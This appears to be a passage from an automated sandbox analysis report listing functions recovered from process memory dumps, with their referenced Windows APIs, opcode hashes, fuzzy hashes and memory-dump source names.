API ID: FindWindow
String ID:
API String ID: 134000473-0
Opcode ID: 6eaf1c2ca662334749949a2cc96da0691db8d71fe17b38669c614ccc34433e91
Instruction ID: be855bd1da80062e9bc1cd8ca613295536b172fa0782a4a25449eaf8742f666d
Opcode Fuzzy Hash: 6eaf1c2ca662334749949a2cc96da0691db8d71fe17b38669c614ccc34433e91
Instruction Fuzzy Hash: 1A2124B5C003498FCB00CF9AD544ADEFBB4FF49220F51851EE819B7240C375A544CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 1D1AA440, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32 ref: 1D1AA4AF

Memory Dump Source

Source File: 0000000B.00000002.7363251229.000000001D1A0000.00000040.00000010.sdmp, Offset: 1D1A0000, based on PE: false

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 05c1c32b449db053a1fdcd9b19a4ba5d405372301afeac985f52e84b40cbc5a4
Instruction ID: f12472d281dd1ecabfe3ed80f120ea1f06de12a7a84a2cd08aa9134c92288914
Opcode Fuzzy Hash: 05c1c32b449db053a1fdcd9b19a4ba5d405372301afeac985f52e84b40cbc5a4
Instruction Fuzzy Hash: 631144B1C042599FCB10CFAAD5487DEFBB4AF48320F05852AD918A7241D378A944CFE2

Uniqueness

Uniqueness Score: -1.00%

Function 1E0637C8, Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 1E0657B6

Memory Dump Source

Source File: 0000000B.00000002.7364772543.000000001E060000.00000040.00000001.sdmp, Offset: 1E060000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: c9345fcee0bb11e226bbb4f5a3c7121c993d0cd353da5f90fabfc7580938bf9e
Instruction ID: a52b71fd20ef44354a0d103ad2f6cf8a7dd34ce2e8daeb771ca97c1dbfb2f11c
Opcode Fuzzy Hash: c9345fcee0bb11e226bbb4f5a3c7121c993d0cd353da5f90fabfc7580938bf9e
Instruction Fuzzy Hash: 3D11F0B5D002498FCB10CF9AD444B9EFBF8AF89224F14891AD919B7310D375A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 010068E8, Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 01006945

Memory Dump Source

Source File: 0000000B.00000002.7348540825.0000000001000000.00000040.00000001.sdmp, Offset: 01000000, based on PE: false

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: d6dd679bd70ee57397a09a4d3862d03eb3d29167b544b55e0f34ec9c6cb58797
Instruction ID: 28810a7e4f2bf4975f3bef354b77684507f60d0b0d4306dee09b6e19e5732bec
Opcode Fuzzy Hash: d6dd679bd70ee57397a09a4d3862d03eb3d29167b544b55e0f34ec9c6cb58797
Instruction Fuzzy Hash: C81112B0C002488FDB10CFAAD549BDEFBF8EF49324F14885AD658A7640C775A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01005EA0, Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 01006945

Memory Dump Source

Source File: 0000000B.00000002.7348540825.0000000001000000.00000040.00000001.sdmp, Offset: 01000000, based on PE: false

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: eb4ccc56b93e7234cea266274104a1c2ca0262aa060a1d9386a109e390590888
Instruction ID: 21b88112c3b19aabc3e2294e8bbf0e61a15b68136c0108c5d298145d49e3dbf3
Opcode Fuzzy Hash: eb4ccc56b93e7234cea266274104a1c2ca0262aa060a1d9386a109e390590888
Instruction Fuzzy Hash: C01133B08042488FDB20CF9AD548BDEFBF8EF48224F14842AD658A7740C375A940CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0143C00F, Relevance: 1.5, Strings: 1, Instructions: 269COMMON

Download Yara Rule

Strings

j, xrefs: 0143C1A2

Memory Dump Source

Source File: 0000000B.00000002.7350284492.0000000001430000.00000040.00000010.sdmp, Offset: 01430000, based on PE: false

Similarity

API ID:
String ID: j
API String ID: 0-2137352139
Opcode ID: 0e40e3261d088d209022e7146ec47b5311cc978613a247af5076a9f99bc15b2a
Instruction ID: 99c3f896792e1744528d081b2d1f9b6a951870b0743eb3e7143d808cbd33b7f3
Opcode Fuzzy Hash: 0e40e3261d088d209022e7146ec47b5311cc978613a247af5076a9f99bc15b2a
Instruction Fuzzy Hash: 9491C23560D3C24FD70387B8882965A7FE19F86214F1A84F7D148DB2A7DB788C1AC752

Uniqueness

Uniqueness Score: -1.00%

Function 01439770, Relevance: 1.4, Strings: 1, Instructions: 160COMMON

Download Yara Rule

Strings

H.l, xrefs: 014398F9

Memory Dump Source

Source File: 0000000B.00000002.7350284492.0000000001430000.00000040.00000010.sdmp, Offset: 01430000, based on PE: false

Similarity

API ID:
String ID: H.l
API String ID: 0-1071214204
Opcode ID: 423d3cdd046b9ee9d100e916ac70770a4e8f67ee309dd2882b120596d16c009d
Instruction ID: 95405753428a7c1d7306f4c3380d5865c9f12e20574b368deb7e0082d99c23d2
Opcode Fuzzy Hash: 423d3cdd046b9ee9d100e916ac70770a4e8f67ee309dd2882b120596d16c009d
Instruction Fuzzy Hash: DC511031B00515CFD7189B7EC84476EB6E2AFC9308F16807ADA199B7B5CB74DC018B92

Uniqueness

Uniqueness Score: -1.00%

Function 014372C9, Relevance: 1.4, Strings: 1, Instructions: 101COMMON

Download Yara Rule

Strings

PH*l, xrefs: 01437400

Memory Dump Source

Source File: 0000000B.00000002.7350284492.0000000001430000.00000040.00000010.sdmp, Offset: 01430000, based on PE: false

Similarity

API ID:
String ID: PH*l
API String ID: 0-3215977885
Opcode ID: 86be324e939c6eac2b1852061079d00bfbcf6941db7742f4cc697e3af0f7e795
Instruction ID: f69364a98a00f9a3eab36267d5d49a2133aa40451ac563a835e7a191b6acce1f
Opcode Fuzzy Hash: 86be324e939c6eac2b1852061079d00bfbcf6941db7742f4cc697e3af0f7e795
Instruction Fuzzy Hash: 02310271B002258FDB049F78C55969FBBB2EFCA244B258529D406EB760DF30DD02CB95

Uniqueness

Uniqueness Score: -1.00%

Function 014372D8, Relevance: 1.3, Strings: 1, Instructions: 99COMMON

Download Yara Rule

Strings

PH*l, xrefs: 01437400

Memory Dump Source

Source File: 0000000B.00000002.7350284492.0000000001430000.00000040.00000010.sdmp, Offset: 01430000, based on PE: false

Similarity

API ID:
String ID: PH*l
API String ID: 0-3215977885
Opcode ID: 83a1f00a50cf7c42c468332030e25a7e846183fe199571b72154454b7b823c67
Instruction ID: 96eaffbf10bf2f903156dab20476b426d5e70f38b534d92986fa47a92e91d7b8
Opcode Fuzzy Hash: 83a1f00a50cf7c42c468332030e25a7e846183fe199571b72154454b7b823c67
Instruction Fuzzy Hash: 3731D431B002158FDB049B78C5596AFBBF6EFCA284B258429D406DB761DF34DD02CB96

Uniqueness

Uniqueness Score: -1.00%

Function 01439DE0, Relevance: .4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.7350284492.0000000001430000.00000040.00000010.sdmp, Offset: 01430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d04c8d2cfddd5a5efee6b9ba0607b318b00a8cb283344b38325b818bfe8c1d3
Instruction ID: 2e4fc5d42953ea80093997ff0e76cc6b2f6dcd19de675960de5a24075c04efcc
Opcode Fuzzy Hash: 5d04c8d2cfddd5a5efee6b9ba0607b318b00a8cb283344b38325b818bfe8c1d3
Instruction Fuzzy Hash: 14D1E171B042158FCB00DFB8C9886AE7BF2AFC9254F29846AD545DB3A1DB74DC06CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01436779, Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.7350284492.0000000001430000.00000040.00000010.sdmp, Offset: 01430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4abfe87840e9c17c5fed6db4d1179b909238c4e1cbc39603b332df8bbe24ec3b
Instruction ID: 8e585df3d623dc040c7ecdeaec7992e75bc1ed09a988ec043cc23753f05f7b0b
Opcode Fuzzy Hash: 4abfe87840e9c17c5fed6db4d1179b909238c4e1cbc39603b332df8bbe24ec3b
Instruction Fuzzy Hash: 6F717839E253588FDB00DFA0C9DC9CEBBB1BF89314B518866E801AB754DB306E19CB45

Uniqueness

Uniqueness Score: -1.00%

Function 01439B58, Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.7350284492.0000000001430000.00000040.00000010.sdmp, Offset: 01430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd8c95b16b61381a0be42de92e87233ec7e48461eaa5d21bf5079fb59424db21
Instruction ID: 6af13964b67549debbe1e2ddf4c8ba1379f92a5746e2016755dfd6fe389551e5
Opcode Fuzzy Hash: fd8c95b16b61381a0be42de92e87233ec7e48461eaa5d21bf5079fb59424db21
Instruction Fuzzy Hash: 1151B535B042158FCB14EBB8C98869DB7F2AFC8368B568929D505EB354DF31ED02CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0143AD03, Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.7350284492.0000000001430000.00000040.00000010.sdmp, Offset: 01430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afbbbcae0aaf9c5bb9cf753f3ed9abd6b28f812584083d2f09d7791ed7e2319d
Instruction ID: 9f75015ae307445a12e7fc4d3a08bf332e4cf916d96802fa3ba049d5a6cd2c52
Opcode Fuzzy Hash: afbbbcae0aaf9c5bb9cf753f3ed9abd6b28f812584083d2f09d7791ed7e2319d
Instruction Fuzzy Hash: 12512874E002199FCB549FB4C99C69EBBF2EF89204F1088A9D906E7350EB389945CF51

Uniqueness

Uniqueness Score: -1.00%

Function 01439D88, Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.7350284492.0000000001430000.00000040.00000010.sdmp, Offset: 01430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6f48b4679b183dea9ebbaa18fd81d6bd4b220e4c8c392ade12771cb28795aef
Instruction ID: b3b05a2ad50c2eb166152430740ddbdaf0307a3dc157e55d73d9d0434032796d
Opcode Fuzzy Hash: a6f48b4679b183dea9ebbaa18fd81d6bd4b220e4c8c392ade12771cb28795aef
Instruction Fuzzy Hash: 4D41D130B002158FDF40CB68C9886AE7BF2AFC9358F25816AD505DB3A5EB70DC46CB95

Uniqueness

Uniqueness Score: -1.00%

Function 014367D8, Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.7350284492.0000000001430000.00000040.00000010.sdmp, Offset: 01430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a65927be8b1ac8a0f1f5250659df815654cf37dcac9a9469c0257febe8a78f91
Instruction ID: 691dd9f4e18bb3457812bc4b9ff13a46c17a853242f1f28e8c98a39978450dc8
Opcode Fuzzy Hash: a65927be8b1ac8a0f1f5250659df815654cf37dcac9a9469c0257febe8a78f91
Instruction Fuzzy Hash: 2451D43AE213288FDB40DFA4C5DC9CEBBB5BB48314B908925E811A7714DB316E19CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0143A2C4, Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.7350284492.0000000001430000.00000040.00000010.sdmp, Offset: 01430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 285d2490daedfe5daa480b066cd92d8aadcabffd722223f1ae9aab4976d4befe
Instruction ID: 253f16109cb3a4a7762266e51ca8b33ec9fa9bdd4b1f47cc67bfc7e19ecfb048
Opcode Fuzzy Hash: 285d2490daedfe5daa480b066cd92d8aadcabffd722223f1ae9aab4976d4befe
Instruction Fuzzy Hash: EC412635B003158FCB45ABB8C8586AE7BF2AFC9204B148579D50ADB7A5DF74DC06C782

Uniqueness

Uniqueness Score: -1.00%

Function 014351E8, Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.7350284492.0000000001430000.00000040.00000010.sdmp, Offset: 01430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb27d4079dadff970018e43612740912ca2bf782cd9df3ead9e66bb32e08ed3e
Instruction ID: b2c3eac99d997b0898ebefd9a91bcf5534295df198183329770840a0b3ea8b21
Opcode Fuzzy Hash: eb27d4079dadff970018e43612740912ca2bf782cd9df3ead9e66bb32e08ed3e
Instruction Fuzzy Hash: B231E835B002158BDF259BACD98436FB761EBCA210F10483BE50ADF761CB70DD458B96

Uniqueness

Uniqueness Score: -1.00%

Function 0143C4E7, Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.7350284492.0000000001430000.00000040.00000010.sdmp, Offset: 01430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: facabd28ceb47833c6cb8f6f672d64899f6ef4528c5deb81442aecd8b7476020
Instruction ID: f907630a16a101c11c56b64d231bd38c5c999875d1f7c41dd8c6945f99f00614
Opcode Fuzzy Hash: facabd28ceb47833c6cb8f6f672d64899f6ef4528c5deb81442aecd8b7476020
Instruction Fuzzy Hash: DC31C171A043068BDB018F69D880799FBB1FF88314F15C16AD909AF356E7B5D854CB90

Uniqueness

Uniqueness Score: -1.00%

Function 014394D8, Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.7350284492.0000000001430000.00000040.00000010.sdmp, Offset: 01430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 207a84510b9b55ac9f62b7a9c6510f97576f891a9461f697c542115b77b1d1df
Instruction ID: c6efd7b7a8b3f4da969832dfdefc231e79dd87dcd7d0a9627c8d9e4666aeb240
Opcode Fuzzy Hash: 207a84510b9b55ac9f62b7a9c6510f97576f891a9461f697c542115b77b1d1df
Instruction Fuzzy Hash: ED218D31A081189BDB04DBA8D9586EEB7B2EFCC318F15802AD502B73D4CF749D41CB62

Uniqueness

Uniqueness Score: -1.00%

Function 1DFAD3D8, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.7364126659.000000001DFAD000.00000040.00000001.sdmp, Offset: 1DFAD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdd6c3fe6b85769f8b6150643951dca054f1fc2ee4ceede5f4a2093a93b9b88b
Instruction ID: 26e3c511e2863fc425f55b97fc9042e3c538dcfff51983d709f52f217c94b8b5
Opcode Fuzzy Hash: cdd6c3fe6b85769f8b6150643951dca054f1fc2ee4ceede5f4a2093a93b9b88b
Instruction Fuzzy Hash: 6E213671104241DFDB01CF1CDDC4B16BB65FB88324F20C569DD094B286D336E656C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 1DFAD4C4, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.7364126659.000000001DFAD000.00000040.00000001.sdmp, Offset: 1DFAD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ef63c377b9832d57bfdca7bdda92057850896db6df56103c8b6972ec8ae5afd
Instruction ID: f34a56512ddacd45d53fbd8322b5d9f560ee1e4a91c2ac3b33b45376439296ca
Opcode Fuzzy Hash: 7ef63c377b9832d57bfdca7bdda92057850896db6df56103c8b6972ec8ae5afd
Instruction Fuzzy Hash: 27212471504240DFCB01DF1CDD80B26BF65FB88728F24C569E9080B286D376E615C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0143C620, Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.7350284492.0000000001430000.00000040.00000010.sdmp, Offset: 01430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb2e4d52d2ac8fda5e9a7986fdfca61926145a7e3253586e616b20a3e9bbe1c8
Instruction ID: 1d6d9c3ed0dc86aa75fd0c7847d5fd369b843073d7506fcb4b655c03005b6f43
Opcode Fuzzy Hash: fb2e4d52d2ac8fda5e9a7986fdfca61926145a7e3253586e616b20a3e9bbe1c8
Instruction Fuzzy Hash: 97219D31B405158BDB148B69C588BAE76E6AFCD724F20816BE509BB3F0CB71AC009B91

Uniqueness

Uniqueness Score: -1.00%

Function 0143C617, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.7350284492.0000000001430000.00000040.00000010.sdmp, Offset: 01430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4dfb8435924b488be150a563f1cf7ab11519c77411ba48533ef539162639d41
Instruction ID: acba2f4d99831bed6ec62ac2f2ab640e4c8010b775fc712c5ebd32c063fbf0fa
Opcode Fuzzy Hash: a4dfb8435924b488be150a563f1cf7ab11519c77411ba48533ef539162639d41
Instruction Fuzzy Hash: 84215C31A402158FDB04CB69C598BAA7BF6AFCD710F14806BD509EB3B0DAB19C019B51

Uniqueness

Uniqueness Score: -1.00%

Function 1DFBD01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.7364238956.000000001DFBD000.00000040.00000001.sdmp, Offset: 1DFBD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8112a2cc06a4b944e5aff9aedc8a0f89152b71c3be5cdc1d831fdfca9cf06e3a
Instruction ID: c403b6b615e1f1c6cbe7e692401526f7e4bcd25be7696b403e3e4f3817c2a7e6
Opcode Fuzzy Hash: 8112a2cc06a4b944e5aff9aedc8a0f89152b71c3be5cdc1d831fdfca9cf06e3a
Instruction Fuzzy Hash: 1521F875608240DFDB05CF2CDD84B16BB61FB44764F28C569D98A4B28AC337D546CB63

Uniqueness

Uniqueness Score: -1.00%

Function 1DFBD005, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.7364238956.000000001DFBD000.00000040.00000001.sdmp, Offset: 1DFBD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dd49240eeb8d9160b8a7eb87bf005b0e78774c4465097708b4aa577645d2b4c
Instruction ID: f465cd04ef2a330aea40952e5d538e7aaecdee9bd71e712ac5100d050b1fdd46
Opcode Fuzzy Hash: 1dd49240eeb8d9160b8a7eb87bf005b0e78774c4465097708b4aa577645d2b4c
Instruction Fuzzy Hash: 942192755097809FC702CF28D994B11BF71EB46314F28C5EAD8898B296C33AD906CB63

Uniqueness

Uniqueness Score: -1.00%

Function 01434EA3, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.7350284492.0000000001430000.00000040.00000010.sdmp, Offset: 01430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3f2f539bb5a9b8c21ebf9c4f612fe4043cbf2491d914072efcb8b5132e975ea
Instruction ID: 36009aa7387a2cb19882372fbf2ed903fbb5d783a1f62323c50c496f78a54d13
Opcode Fuzzy Hash: d3f2f539bb5a9b8c21ebf9c4f612fe4043cbf2491d914072efcb8b5132e975ea
Instruction Fuzzy Hash: 31113D71E052099FCB44CFA8D5845EEBBF1FF89324F28812AD505EB351D7319942CB94

Uniqueness

Uniqueness Score: -1.00%

Function 1DFAD3D3, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.7364126659.000000001DFAD000.00000040.00000001.sdmp, Offset: 1DFAD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a986f1c596d8c714ff1dcf68be0c34d5cfe61b79dd53f34cae3e6b9c014e3663
Instruction ID: 064209482c7b5fc6ac7250dad4bc4e3fc6d931610f327c86da7d6e76d166ff3f
Opcode Fuzzy Hash: a986f1c596d8c714ff1dcf68be0c34d5cfe61b79dd53f34cae3e6b9c014e3663
Instruction Fuzzy Hash: AF11E676504281DFDB01CF18D9C4B16BF71FB84324F24C6A9DC490B656D33AE656CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 1DFAD4BF, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.7364126659.000000001DFAD000.00000040.00000001.sdmp, Offset: 1DFAD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a986f1c596d8c714ff1dcf68be0c34d5cfe61b79dd53f34cae3e6b9c014e3663
Instruction ID: 60f17bff4d48e4df13410459b6dd955f9cecc400feccc739245e1fbb705d00e4
Opcode Fuzzy Hash: a986f1c596d8c714ff1dcf68be0c34d5cfe61b79dd53f34cae3e6b9c014e3663
Instruction Fuzzy Hash: 0511E676904280CFCB01CF18D9C4B1ABF71FF84314F24C5A9D8490B656D336D556CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 014371F8, Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.7350284492.0000000001430000.00000040.00000010.sdmp, Offset: 01430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d0335c766a235bcd80491118ff9cbe2cde8059ddc9069479a261020ad24159d
Instruction ID: 4b354ee5a85c5d3ac38c5f3a1a5bfa56feb7aa9fd7587f4085ff4c1fc3ad23b5
Opcode Fuzzy Hash: 4d0335c766a235bcd80491118ff9cbe2cde8059ddc9069479a261020ad24159d
Instruction Fuzzy Hash: 58113D35B046249FCB40DBBCC98859E77F2FB8C214B10842AE409E7711EF349E16CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0143A1F8, Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.7350284492.0000000001430000.00000040.00000010.sdmp, Offset: 01430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c670634f2d28615e038eb48ec78a054f4cc630287b44f7474e583e6189c2f0ff
Instruction ID: 26fa50a9c6b94911fd39828728e1cfff91730334760be8750258498254f8d37e
Opcode Fuzzy Hash: c670634f2d28615e038eb48ec78a054f4cc630287b44f7474e583e6189c2f0ff
Instruction Fuzzy Hash: CF115275F001299FCB80EBBDC88459E77F5AFCD624710852AD409E7764EB349D028B95

Uniqueness

Uniqueness Score: -1.00%

Function 01437200, Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.7350284492.0000000001430000.00000040.00000010.sdmp, Offset: 01430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ac4c64dc95d65840ca4777a072e5e5ba39d43f4305caaad32bbb07604f0da22
Instruction ID: b345c2037181a8b7488681837f7922cb1e5c6191ec58f476de72e982f52fe55b
Opcode Fuzzy Hash: 7ac4c64dc95d65840ca4777a072e5e5ba39d43f4305caaad32bbb07604f0da22
Instruction Fuzzy Hash: 6F11E835B006299FCB40DBBCC98859E77F6FB8C255B10842AE509E3711EF349E26CB95

Uniqueness

Uniqueness Score: -1.00%

Function 01439B50, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.7350284492.0000000001430000.00000040.00000010.sdmp, Offset: 01430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 773ca0a75023053b8354a1ee338676f2234cef88725bc1ce2140a8e28e30d369
Instruction ID: 15acd7291181f1008d06390903ddae8032d93840120e24e26d8d1706a7fa2886
Opcode Fuzzy Hash: 773ca0a75023053b8354a1ee338676f2234cef88725bc1ce2140a8e28e30d369
Instruction Fuzzy Hash: AAF024367091149FCB208A68DC856EF77A6EFC83A4F11853AD902DB290D7726D028B81

Uniqueness

Uniqueness Score: -1.00%

Function 0143C2C8, Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.7350284492.0000000001430000.00000040.00000010.sdmp, Offset: 01430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd17001b88cb2b8bdae1b8e53173eed2155f7dbc250bca72f8cb209a69366316
Instruction ID: 28565b9269ef5d2b51edc517e63fa1a6e8566a55976ebf5293dd5a36ddfbde1c
Opcode Fuzzy Hash: fd17001b88cb2b8bdae1b8e53173eed2155f7dbc250bca72f8cb209a69366316
Instruction Fuzzy Hash: 5FF08275F042299FCF40ABB954082DF7AF5ABC8161B150436D509E3300EB349E018BE5

Uniqueness

Uniqueness Score: -1.00%

Function 01434DDB, Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.7350284492.0000000001430000.00000040.00000010.sdmp, Offset: 01430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c9b910c1a721b58279296b8a96b7c316ad6213572daf50cc2bd1c16a25e2c2e
Instruction ID: a073e24d6ac9f3d8fad5b5f2c0873c49bbf08479e46de377eb2c3286984bd800
Opcode Fuzzy Hash: 9c9b910c1a721b58279296b8a96b7c316ad6213572daf50cc2bd1c16a25e2c2e
Instruction Fuzzy Hash: C8F03071E041159F8B509FAD98491EEBBF5EAC9321B15417AE55AD3300EA304A168BD1

Uniqueness

Uniqueness Score: -1.00%

Function 01434DE8, Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.7350284492.0000000001430000.00000040.00000010.sdmp, Offset: 01430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 715a6d402b68dee0375e74fa689fbb7ea70e6eb7fe111fca44185ef170a232f9
Instruction ID: 09bdbb88ea2344c1b598b2d739201456682fc1512629dcbc63d8b869ca07c770
Opcode Fuzzy Hash: 715a6d402b68dee0375e74fa689fbb7ea70e6eb7fe111fca44185ef170a232f9
Instruction Fuzzy Hash: B2E04871E042159F8B90EFBD98455EFBBF8EACC261B154076E51DD3300EA304A11CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 0143A257, Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.7350284492.0000000001430000.00000040.00000010.sdmp, Offset: 01430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2888b092278d172d3c3fec6bbc3d3195333703938123c14317c3e1e3f7ed42a1
Instruction ID: c9deb67ad75ecbd0160065ae33629c60cfae4502b8c5494764d1185fc8685001
Opcode Fuzzy Hash: 2888b092278d172d3c3fec6bbc3d3195333703938123c14317c3e1e3f7ed42a1
Instruction Fuzzy Hash: BCE0C975B0012A8BCF40EBF9D8545DDB3F1ABDC225B11802AE549E7764DE349D118B61

Uniqueness

Uniqueness Score: -1.00%

Function 01437261, Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.7350284492.0000000001430000.00000040.00000010.sdmp, Offset: 01430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 193c081ccde95b26274fef165a2f9e68feebd1e5e40498d9d8f64513120c00a9
Instruction ID: d5fe2ebe24f8a0be3737a7d51995353df4086a85179fb23d2cf187f08306a9f4
Opcode Fuzzy Hash: 193c081ccde95b26274fef165a2f9e68feebd1e5e40498d9d8f64513120c00a9
Instruction Fuzzy Hash: E5F0A535B04514CBCF00DBA8DD9C59D77B2FB88266B018035E506E3721DE38AD26CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0143FD97, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.7350284492.0000000001430000.00000040.00000010.sdmp, Offset: 01430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 916c9b51201f3574a181d5fb1595c9502275e3534faed4a85b580307b39572d4
Instruction ID: fdc5e921863bd50424ba7c291c6d3e657419808cba4dd41136122f3809bb575a
Opcode Fuzzy Hash: 916c9b51201f3574a181d5fb1595c9502275e3534faed4a85b580307b39572d4
Instruction Fuzzy Hash: ABE09231A086608FD315AB78E4687697FE1DB96209F0581AFD04597AB5DF348905C783

Uniqueness

Uniqueness Score: -1.00%

Function 0143FDA8, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.7350284492.0000000001430000.00000040.00000010.sdmp, Offset: 01430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b426d760d2e50ab254258270a637e193bbacff3b1f010300f8343976a38d678
Instruction ID: f9e3ac80c2e8d3e37fda61df5a68329864c310e2839aae12543b457f0e4fdce3
Opcode Fuzzy Hash: 4b426d760d2e50ab254258270a637e193bbacff3b1f010300f8343976a38d678
Instruction Fuzzy Hash: B8E0C235A006248BC311ABBCD45825A7BE4EF86219F018127D505E7764EF359D5587C3

Uniqueness

Uniqueness Score: -1.00%

Function 0143741A, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.7350284492.0000000001430000.00000040.00000010.sdmp, Offset: 01430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6717a1aedd990bbb076f6f67bae7f1046dc0873493c795acce4132ee30d6d652
Instruction ID: d6d26d45a69f93702c89e03562d127c211981d90836cca57afe1c148386db392
Opcode Fuzzy Hash: 6717a1aedd990bbb076f6f67bae7f1046dc0873493c795acce4132ee30d6d652
Instruction Fuzzy Hash: D5D0C936B08104CBCF14ABF0ED0C0DCB731EF8122AB504475D10692570CF3A5865CA14

Uniqueness

Uniqueness Score: -1.00%

Function 0143C0C8, Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

